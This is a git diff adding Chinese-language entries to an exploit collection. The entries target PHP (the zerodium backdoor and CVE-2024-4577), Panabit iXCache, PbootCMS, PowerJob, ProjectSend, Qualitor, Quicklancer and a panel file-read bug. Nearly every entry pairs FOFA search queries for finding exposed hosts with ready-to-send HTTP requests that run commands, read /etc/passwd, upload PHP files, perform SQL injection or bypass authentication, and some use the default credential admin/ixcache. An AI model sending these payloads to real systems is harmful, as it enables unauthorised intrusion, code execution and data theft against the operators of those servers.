--- /dev/null
+++ b/PHP-8.1.0-devzerodium后门命令执行漏洞.md
@@ -0,0 +1,30 @@
+# PHP-8.1.0-dev zerodium后门命令执行漏洞
+
+# 一、漏洞简介
+PHP 8.1.0-dev 版本在2021年3月28日被植入后门，但是后门很快被发现并清除。当服务器存在该后门时，攻击者可以通过发送`User-Agentt`头来执行任意代码。
+
+# 二、影响版本
++ PHP/8.1.0-dev
+
+# 三、资产测绘
++ fofa`"PHP/8.1.0-dev"`
++ 特征
+
+![1696168261552-13f55cc9-34bf-4a45-b935-812435375e09.png](./img/NF04CG2inYN-Es8-/1696168261552-13f55cc9-34bf-4a45-b935-812435375e09-358972.png)
+
+# 四、漏洞复现
+```plain
+GET / HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agentt: zerodiumsystem("cat /etc/passwd");
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+```
+
+![1696168333495-01ed0a8c-814b-48b8-94bf-dd024eb424c7.png](./img/NF04CG2inYN-Es8-/1696168333495-01ed0a8c-814b-48b8-94bf-dd024eb424c7-736557.png)
+
+
+
+> 更新: 2024-09-05 23:27:24  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wr81rdntsr6nz25n>
\ No newline at end of file
diff --git a/PHPCGIWindows平台远程代码执行漏洞(CVE-2024-4577).md b/PHPCGIWindows平台远程代码执行漏洞(CVE-2024-4577).md
new file mode 100644
index 0000000..34bd922
--- /dev/null
+++ b/PHPCGIWindows平台远程代码执行漏洞(CVE-2024-4577).md
@@ -0,0 +1,40 @@
+# PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
+
+# 一、漏洞简介
+<font style="color:rgb(53, 53, 53);">PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性，当 PHP-CGI 运行在Window平台且使用了如下语系（简体中文936/繁体中文950/日文932等）时，攻击者可构造恶意请求绕过 CVE-2012-1823 补丁，从而可在无需登陆的情况下执行任意PHP代码。</font>
+
+# 二、影响版本
+```java
+PHP 8.3 < 8.3.8 
+PHP 8.2 < 8.2.20 
+PHP 8.1 < 8.1.29
+利用条件：
+1、用户认证：无需用户认证
+2、前置条件：默认配置
+3、触发方式：远程
+```
+
+# 三、资产测绘
++ fofa`app="XAMPP" `
++ 特征
+
+![1717781448311-7a65fa38-1b93-46b2-866e-bc4080028b76.png](./img/kDk7tGfPzFbz3N1v/1717781448311-7a65fa38-1b93-46b2-866e-bc4080028b76-703129.png)
+
+# 四、漏洞复现
+```java
+POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1
+Host: 
+REDIRECT-STATUS:1
+Content-type: text/html; charset=UTF-8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 29
+
+<?php system("whoami")?>
+```
+
+![1717781553755-883046d2-ce02-4bcc-95fe-c4c98e0f1bae.png](./img/kDk7tGfPzFbz3N1v/1717781553755-883046d2-ce02-4bcc-95fe-c4c98e0f1bae-406115.png)
+
+
+
+> 更新: 2024-09-05 23:27:24  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tihl0itqro7zdhy5>
\ No newline at end of file
diff --git a/Panabit iXCache网关RCE漏洞CVE-2023-38646.md b/Panabit iXCache网关RCE漏洞CVE-2023-38646.md
index f069124..803372e 100644
--- a/Panabit iXCache网关RCE漏洞CVE-2023-38646.md	
+++ b/Panabit iXCache网关RCE漏洞CVE-2023-38646.md	
@@ -8,7 +8,4 @@ Content-Type: application/x-www-form-urlencoded
 Content-Length: 107
 
 ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1
-
-
-
 ```
diff --git a/Panabit-iXCache网关RCE漏洞CVE-2023-38646.md b/Panabit-iXCache网关RCE漏洞CVE-2023-38646.md
new file mode 100644
index 0000000..803372e
--- /dev/null
+++ b/Panabit-iXCache网关RCE漏洞CVE-2023-38646.md
@@ -0,0 +1,11 @@
+## Panabit iXCache网关RCE漏洞CVE-2023-38646
+```
+POST /cgi-bin/Maintain/date_config HTTP/1.1
+Host: 127.0.0.1:8443
+Cookie: pauser_9667402_260=paonline_admin_44432_9663; pauser_9661348_661=paonline_admin_61912_96631
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 107
+
+ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1
+```
diff --git a/PanabitiXCacheajax_cmd存在后台命令执行漏洞.md b/PanabitiXCacheajax_cmd存在后台命令执行漏洞.md
new file mode 100644
index 0000000..374c28b
--- /dev/null
+++ b/PanabitiXCacheajax_cmd存在后台命令执行漏洞.md
@@ -0,0 +1,43 @@
+# Panabit iXCache ajax_cmd存在后台命令执行漏洞
+
+# 一、漏洞简介
+panabit缓存加速产品是一款基于派网公司自研的操作系统（PanaOS）上研发的内容缓存产品。iXCache依靠高稳定性、高可靠性两大特点，可缓存丰富的资源，目前支持Web视频、移动视频、Web音乐、移动音乐、软件下载、应用商店、游戏补丁等八大类资源的缓存。部署灵活、支持交换机镜像和Panabit牵引两种模式，满足不同级别的用户需求。panabit iXCache系统ajax_cmd存在命令执行漏洞，攻击者通过漏洞可以执行任意命令，导致服务器失陷。
+
+# 二、影响版本
++ Panabit iXCache
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(255, 0, 0);">title="iXCache"</font>`
++ 特征
+
+![1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7.png](./img/dxmkz2REfz98ryF9/1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7-202725.png)
+
+# 四、漏洞复习
+1. 使用弱口令`admin/ixcache`登陆系统,获取cookie
+
+![1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f.png](./img/dxmkz2REfz98ryF9/1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f-952342.png)
+
+2. 使用上一步获取的cookie，执行命令
+
+```plain
+POST /cgi-bin/Maintain/ajax_cmd?action=runcmd&cmd=ls HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Cookie: _walkthrough-introduction=0; pauser_1706355982_749237=paonline_admin_54360_17068008921; pauser_965865545_617716=paonline_admin_59195_9663105331; pauser_1628486854_900424=paonline_admin_84071_16289322461
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Content-Length: 0
+```
+
+![1706801708864-338c6ff8-4078-44a8-aa0a-e73d784b7807.png](./img/dxmkz2REfz98ryF9/1706801708864-338c6ff8-4078-44a8-aa0a-e73d784b7807-973503.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/provn8b8ocqxex5v>
\ No newline at end of file
diff --git a/PanabitiXCachedate_config存在后台命令执行漏洞.md b/PanabitiXCachedate_config存在后台命令执行漏洞.md
new file mode 100644
index 0000000..8362397
--- /dev/null
+++ b/PanabitiXCachedate_config存在后台命令执行漏洞.md
@@ -0,0 +1,39 @@
+# Panabit iXCache date_config存在后台命令执行漏洞
+
+# 一、漏洞简介
+panabit缓存加速产品是一款基于派网公司自研的操作系统（PanaOS）上研发的内容缓存产品。iXCache依靠高稳定性、高可靠性两大特点，可缓存丰富的资源，目前支持Web视频、移动视频、Web音乐、移动音乐、软件下载、应用商店、游戏补丁等八大类资源的缓存。部署灵活、支持交换机镜像和Panabit牵引两种模式，满足不同级别的用户需求。panabit iXCache系统date_config存在命令执行漏洞，攻击者通过漏洞可以执行任意命令，导致服务器失陷。
+
+# 二、影响版本
++ Panabit iXCache
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(255, 0, 0);">title="iXCache"</font>`
++ 特征
+
+![1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7.png](./img/okCSs9cCa7o9RLED/1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7-147741.png)
+
+# 四、漏洞复习
+1. 使用弱口令`admin/ixcache`登陆系统,获取cookie
+
+![1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f.png](./img/okCSs9cCa7o9RLED/1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f-179934.png)
+
+2. 使用上一步获取的cookie，执行命令（每次发包需要在登录处重新获取一次cookie）
+
+```plain
+POST /cgi-bin/Maintain/date_config HTTP/1.1
+Host: 
+Cookie: pauser_1626709857_644740=paonline_admin_48217_16289319551;Path=/;
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+Cookie: pauser_1706355982_749237=paonline_admin_54360_17068008921; pauser_965865545_617716=paonline_admin_59195_9663105331
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 107
+
+ntpserver=0.0.0.0;ls&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1
+```
+
+![1706801467914-c7d947fa-0610-4ec2-95fc-93f6dace587b.png](./img/okCSs9cCa7o9RLED/1706801467914-c7d947fa-0610-4ec2-95fc-93f6dace587b-495631.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pm3gifvcepzx9xkc>
\ No newline at end of file
diff --git a/PanabitiXCache存在默认口令.md b/PanabitiXCache存在默认口令.md
new file mode 100644
index 0000000..c31e68b
--- /dev/null
+++ b/PanabitiXCache存在默认口令.md
@@ -0,0 +1,23 @@
+# Panabit iXCache 存在默认口令
+
+# 一、漏洞简介
+panabit缓存加速产品是一款基于派网公司自研的操作系统（PanaOS）上研发的内容缓存产品。iXCache依靠高稳定性、高可靠性两大特点，可缓存丰富的资源，目前支持Web视频、移动视频、Web音乐、移动音乐、软件下载、应用商店、游戏补丁等八大类资源的缓存。部署灵活、支持交换机镜像和Panabit牵引两种模式，满足不同级别的用户需求。Panabit iXCache 存在默认口令
+
+# 二、影响版本
++ Panabit iXCache
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(255, 0, 0);">title="iXCache"</font>`
++ 特征
+
+![1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7.png](./img/DS47HuGXtP19Igwy/1706801330303-6f77b29b-5337-4c00-9d58-6227a29488d7-404712.png)
+
+# 四、漏洞复习
+使用弱口令`admin/ixcache`登陆系统,获取cookie
+
+![1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f.png](./img/DS47HuGXtP19Igwy/1706801386353-66163cd9-4b54-4c2e-a39f-4d386894b78f-080334.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pc0sdgk5q8mpzpy2>
\ No newline at end of file
diff --git a/Panel-loadfile-后台文件读取漏洞.md b/Panel-loadfile-后台文件读取漏洞.md
new file mode 100644
index 0000000..767f98c
--- /dev/null
+++ b/Panel-loadfile-后台文件读取漏洞.md
@@ -0,0 +1,5 @@
+## Panel loadfile 后台文件读取漏洞
+```
+POST /api/v1/file/loadfile
+{"paht":"/etc/passwd"}
+```
diff --git a/PbootCMS接口entrance.php存在SQL注入漏洞.md b/PbootCMS接口entrance.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..5aa710f
--- /dev/null
+++ b/PbootCMS接口entrance.php存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# PbootCMS接口entrance.php存在SQL注入漏洞
+
+由于PbootCMS entrance.php 文件代码逻辑缺陷存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息
+
+## fofa
+
+```javascript
+header="PbootCMS" || body="zbeol.com"
+```
+
+## poc
+
+```javascript
+POST /?tag=%7d%73%71%6c%3a%20%20%7b%70%62%6f%6f%74%3a%6c%69%73%74%20%66%69%6c%74%65%72%3d%31%3d%32%29%55%4e%49%4f%4e%28%53%45%4c%45%43%54%2f%2a%2a%2f%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%28%73%65%6c%65%63%74%2f%2a%2a%2f%76%65%72%73%69%6f%6e%28%29%29%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%2c%31%29%2f%2a%2a%2f%23%2f%2a%2a%2f%7c%31%32%33%20%73%63%6f%64%65%3d%31%32%33%7d%5b%6c%69%73%74%3a%6c%69%6e%6b%20%6c%69%6e%6b%3d%61%73%64%5d%7b%2f%70%62%6f%6f%74%3a%6c%69%73%74%7d HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241211210840708](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112108781.png)
\ No newline at end of file
diff --git a/PowerJob信息泄漏漏洞（CVE-2023-29923）.md b/PowerJob信息泄漏漏洞（CVE-2023-29923）.md
new file mode 100644
index 0000000..905727e
--- /dev/null
+++ b/PowerJob信息泄漏漏洞（CVE-2023-29923）.md
@@ -0,0 +1,37 @@
+# PowerJob信息泄漏漏洞（CVE-2023-29923）
+
+# 一、漏洞简介
+PowerJob是一个开源分布式计算和作业调度框架，它允许开发人员在自己的应用程序中轻松调度任务。PowerJob V4.3.1版本存在安全漏洞，该漏洞源于存在不正确访问控制。
+
+# 二、影响版本
++ PowerJob V4.3.1
+
+# 三、资产测绘
++ fofa`title="PowerJob"`
++ 特征
+
+![1707132393105-46d6ce0f-8016-4a1d-a308-ac83ac3d0f6d.png](./img/s1SqmcSJTTrhY2SJ/1707132393105-46d6ce0f-8016-4a1d-a308-ac83ac3d0f6d-433908.png)
+
+# 四、漏洞复现
+```plain
+POST /job/list HTTP/1.1
+Host: 
+Connection: close
+Content-Length: 69
+Content-Type: application/json
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+
+
+{
+        "appId":1,
+        "index":0,
+        "pageSize":10
+}
+```
+
+![1707132481225-23a54101-d385-47d4-b739-42c3ec090ad9.png](./img/s1SqmcSJTTrhY2SJ/1707132481225-23a54101-d385-47d4-b739-42c3ec090ad9-885295.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mcit5dukx60xrcrx>
\ No newline at end of file
diff --git a/ProjectSend身份认证绕过漏洞(CVE-2024-11680).md b/ProjectSend身份认证绕过漏洞(CVE-2024-11680).md
new file mode 100644
index 0000000..991d0ca
--- /dev/null
+++ b/ProjectSend身份认证绕过漏洞(CVE-2024-11680).md
@@ -0,0 +1,131 @@
+# ProjectSend身份认证绕过漏洞(CVE-2024-11680)
+
+PrојесtSеnd版本在r1720之前受到不当认证漏洞的影响,远程未经认证的攻击者可以通过发送精心制作的HTTP请求到орtiоnѕ.рhр来利用这个缺陷,从而未经授权地修改应用程序的配置,成功利用允许攻击者创建账户、上传ԝеbѕhеllѕ,并嵌入恶意JаvаSсript。
+
+## fofa
+
+```javascript
+body="ProjectSend"
+```
+
+## nuclei_poc
+
+```yaml
+id: projectsend-auth-bypass
+
+info:
+  name: ProjectSend <= r1605 - Improper Authorization
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
+  reference:
+    - https://www.projectsend.org/
+    - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: body="ProjectSend"
+    shodan-query: html:"ProjectSend"
+  tags: misconfig,projectsend,auth-bypass,intrusive
+
+variables:
+  string: "{{randstr}}"
+
+flow: http(1) && http(2) && http(3) && http(4) && http(5)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "projectsend")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: csrf
+        group: 1
+        regex:
+          - 'name="csrf_token" value="([0-9a-z]+)"'
+        internal: true
+
+      - type: regex
+        name: title
+        group: 1
+        regex:
+          - '<title>Log in &raquo; ([0-9a-zA-Z]+)<\/title>'
+        internal: true
+
+  - raw:
+      - |
+        POST /options.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        csrf_token={{csrf}}&section=general&this_install_title={{string}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 500'
+          - 'contains(content_type, "text/html")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "{{string}}")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /options.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        csrf_token={{csrf}}&section=general&this_install_title={{title}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 500'
+          - 'contains(content_type, "text/html")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "{{title}}")'
+        condition: and
+
+# digest: 4b0a00483046022100daa2dba9e143fabb75766c67df507d5f0c405097db09624ce331213630ab1354022100ba972f4e1e7dca2d28077ef7f00c1198fd67ef41126ef47d00b5d8db77a78b4a:922c64590222798bb761d5b6d8e72950
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/projectsend-auth-bypass.yaml
+- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
\ No newline at end of file
diff --git a/QualitorcheckAcesso.php存在任意文件上传漏洞.md b/QualitorcheckAcesso.php存在任意文件上传漏洞.md
new file mode 100644
index 0000000..e37351f
--- /dev/null
+++ b/QualitorcheckAcesso.php存在任意文件上传漏洞.md
@@ -0,0 +1,67 @@
+# Qualitor checkAcesso.php存在任意文件上传漏洞
+
+# 一、漏洞简介
+Qualitor checkAcesso.php存在任意文件上传漏洞
+
+# 二、影响版本
++ Qualitor 
+
+# 三、资产测绘
++ fofa`app="Qualitor-Web"`
++ 特征
+
+![1727509167970-d543fa15-b1c4-40b9-91b1-f7e9d6b79657.png](./img/YpPPegF7LDDl-noY/1727509167970-d543fa15-b1c4-40b9-91b1-f7e9d6b79657-467073.png)
+
+# 四、漏洞复现
+```java
+POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849
+ 
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="idtipo"
+ 
+2
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="nmfilestorage"
+ 
+ 
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="nmdiretoriorede"
+ 
+.
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="nmbucket"
+ 
+ 
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="nmaccesskey"
+ 
+ 
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="nmkeyid"
+ 
+ 
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="fleArquivo"; filename="info.php"
+ 
+<?php phpinfo();unlink(__FILE__);?>
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="cdfilestorage"
+ 
+ 
+-----------------------------QUALITORspaceCVEspace2024space44849--
+```
+
+![1728639897143-e9d01fec-9808-4387-9707-69da629ae5b7.png](./img/YpPPegF7LDDl-noY/1728639897143-e9d01fec-9808-4387-9707-69da629ae5b7-159864.png)
+
+```java
+/html/ad/adfilestorage/request/info.php
+```
+
+![1728639914962-87b75123-79a6-425c-867d-eb3debfa671b.png](./img/YpPPegF7LDDl-noY/1728639914962-87b75123-79a6-425c-867d-eb3debfa671b-108101.png)
+
+
+
+> 更新: 2024-10-22 09:36:08  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yiooigqwix8pxlaz>
\ No newline at end of file
diff --git a/QualitorprocessVariavel.php存在未授权命令注入漏洞.md b/QualitorprocessVariavel.php存在未授权命令注入漏洞.md
new file mode 100644
index 0000000..1e2e3ec
--- /dev/null
+++ b/QualitorprocessVariavel.php存在未授权命令注入漏洞.md
@@ -0,0 +1,31 @@
+# Qualitor processVariavel.php存在未授权命令注入漏洞
+
+# 一、漏洞简介
+Qualitor processVariavel.php存在未授权命令注入漏洞
+
+# 二、影响版本
++ Qualitor 
+
+# 三、资产测绘
++ fofa`app="Qualitor-Web"`
++ 特征
+
+![1727509167970-d543fa15-b1c4-40b9-91b1-f7e9d6b79657.png](./img/L8aYuzmwqs7PAe-c/1727509167970-d543fa15-b1c4-40b9-91b1-f7e9d6b79657-280269.png)
+
+# 四、漏洞复现
+```java
+GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("dir"); HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![1727509161767-de95985f-2148-44dd-93cb-de328a80fd07.png](./img/L8aYuzmwqs7PAe-c/1727509161767-de95985f-2148-44dd-93cb-de328a80fd07-616639.png)
+
+
+
+> 更新: 2024-10-22 09:36:08  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qxvfq9fqnxr606r4>
\ No newline at end of file
diff --git a/Qualitor系统接口checkAcesso.php任意文件上传漏洞.md b/Qualitor系统接口checkAcesso.php任意文件上传漏洞.md
new file mode 100644
index 0000000..26e7bfa
--- /dev/null
+++ b/Qualitor系统接口checkAcesso.php任意文件上传漏洞.md
@@ -0,0 +1,53 @@
+# Qualitor系统接口checkAcesso.php任意文件上传漏洞
+
+Qualitor系统接口checkAcesso.php任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+app="Qualitor-Web"
+```
+
+## poc
+
+```javascript
+POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849
+
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="idtipo"
+
+2
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="nmfilestorage"
+
+
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="nmdiretoriorede"
+
+.
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="nmbucket"
+
+
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="nmaccesskey"
+
+
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="nmkeyid"
+
+
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="fleArquivo"; filename="info.php"
+
+<?php phpinfo();unlink(__FILE__);?>
+-----------------------------QUALITORspaceCVEspace2024space44849
+Content-Disposition: form-data; name="cdfilestorage"
+
+
+-----------------------------QUALITORspaceCVEspace2024space44849--
+```
+
+![image-20241012131131290](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121311364.png)
\ No newline at end of file
diff --git a/Qualitor系统接口checkAcesso.php任意文件上传漏洞md b/Qualitor系统接口checkAcesso.php任意文件上传漏洞md
new file mode 100644
index 0000000..51b8fdb
--- /dev/null
+++ b/Qualitor系统接口checkAcesso.php任意文件上传漏洞md
@@ -0,0 +1,23 @@
+# Qualitor系统接口processVariavel.php未授权命令注入漏洞(CVE-2023-47253)
+
+Qualitor 8.20及之前版本存在命令注入漏洞,远程攻击者可利用该漏洞通过PHP代码执行任意代码。
+
+## fofa
+
+```javascript
+app="Qualitor-Web"
+```
+
+## poc
+
+```javascript
+GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("dir"); HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![image-20240927201132596](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272011669.png)
\ No newline at end of file
diff --git a/Qualitor系统接口processVariavel.php未授权命令注入漏洞(CVE-2023-47253).md b/Qualitor系统接口processVariavel.php未授权命令注入漏洞(CVE-2023-47253).md
new file mode 100644
index 0000000..51b8fdb
--- /dev/null
+++ b/Qualitor系统接口processVariavel.php未授权命令注入漏洞(CVE-2023-47253).md
@@ -0,0 +1,23 @@
+# Qualitor系统接口processVariavel.php未授权命令注入漏洞(CVE-2023-47253)
+
+Qualitor 8.20及之前版本存在命令注入漏洞,远程攻击者可利用该漏洞通过PHP代码执行任意代码。
+
+## fofa
+
+```javascript
+app="Qualitor-Web"
+```
+
+## poc
+
+```javascript
+GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("dir"); HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![image-20240927201132596](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272011669.png)
\ No newline at end of file
diff --git a/Quicklancerlisting存在SQL注入漏洞.md b/Quicklancerlisting存在SQL注入漏洞.md
new file mode 100644
index 0000000..09b7cb5
--- /dev/null
+++ b/Quicklancerlisting存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+# Quicklancer listing存在SQL注入漏洞
+
+# 一、漏洞简介
+Quicklancer listing存在SQL注入漏洞
+
+# 二、影响版本
++ Quicklancer 
+
+# 三、资产测绘
++ fofa`"service_fragments/css/gig_detail.css"`
+
+![1722357327737-2f75dc76-450b-4762-baaf-f6cb6b6db449.png](./img/Zctu3AEtWqtDqQ_6/1722357327737-2f75dc76-450b-4762-baaf-f6cb6b6db449-311413.png)
+
+# 四、漏洞复现
+```java
+GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1&salary-type=1&sort=id&subcat= HTTP/1.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+```
+
+```java
+python3 sqlmap.py -r test.txt -p range2 --dbms=mysql --current-db --current-user --batch
+```
+
+![1722357353437-b723d9d3-47f0-445d-8cae-7a8b96f7c899.png](./img/Zctu3AEtWqtDqQ_6/1722357353437-b723d9d3-47f0-445d-8cae-7a8b96f7c899-327561.png)
+
+
+
+> 更新: 2024-08-12 17:15:58  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ggplqb9der0o0i5m>
\ No newline at end of file
diff --git a/README.md b/README.md
index fb40710..1dfca84 100644
--- a/README.md
+++ b/README.md
@@ -1,1122 +1,1225 @@
 # 漏洞收集
-收集整理漏洞EXP/POC,大部分漏洞来源网络，目前收集整理了900多个poc/exp，善用CTRL+F搜索
+收集整理漏洞EXP/POC,大部分漏洞来源网络，目前收集整理了1000多个poc/exp，善用CTRL+F搜索
+
+## 2024.09.08 新增漏洞
+
+- [智联云采SRM2.0系统接口autologin身份认证绕过漏洞](./智互联科技有限公司/智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md)
